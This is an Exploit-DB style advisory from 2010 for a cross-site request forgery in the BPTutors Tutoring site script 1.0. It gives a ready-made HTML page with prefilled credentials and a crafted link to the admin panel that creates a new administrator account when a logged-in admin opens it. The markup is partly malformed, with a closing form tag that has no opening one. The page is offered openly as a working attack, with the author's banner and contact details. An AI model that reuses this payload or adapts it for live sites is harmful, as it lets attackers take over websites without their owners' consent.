BPTutors Tutoring site script - Cross-Site Request Forgery (Add Admin)

EDB-ID:

11896

CVE:



Author:

bi0

Type:

webapps


Platform:

PHP

Date:

2010-03-26


# Title: BPTutors Tutoring site script - [ CSRF ] Create Administrator Account
# Date: 26/3/2010
# Author: bi0
# Software: http://bpowerhouse.info/tutoring-site-script.htm
# Version: 1.0
# Code :

______ __ ______
/\ == \ /\ \ /\ __ \
\ \ __< \ \ \ \ \ \/\ \
\ \_____\ \ \_\ \ \_____\
\/_____/ \/_/ \/_____/

01000010 01101001 01001111

[#]----------------------------------------------------------------[#]
#
# [+] BPTutors Tutoring site script - [ CSRF ] Create Administrator Account
#
# // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Thanks: 2 all my friends !!
# [x] IRC : irc.clickshqip.com / #itsecurity
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ CSRF ]
#
# [ Login ]
# http://[localhost]/[path]/admin/administrators.php
#
# // Start CSRF
|-------------------------------------------------------------------------------|

<html>
Admin ( 6+) <input type="text" name="login" value="admin123" size="6" /><br>
Passwd (6+) <input type="text" name="pass" value="123admin123" size="6" /><br>
Frist Name <input type='text' name='rtfirst_name' value='adminone' ><br>
Last Name <input type='text' name='rtlast_name' value='myadmin'><br>
Email <input type="text" name="email" value="buki@fbi-system.gov" size="16" /><br>
<a class='class_a' href='http://[localhost]/[path]/admin/administrators.php?adm_mode=update&adm_rid=-1&adm_sort_field=6&adm_sort_type=ASC&adm_page_size=1&adm_p=1&adm_new=1'>Create</a>
</form>
</html>

|-------------------------------------------------------------------------------|
# // End of attack
#
[#]------------------------------------------------------------------------------------------[#]

#EOF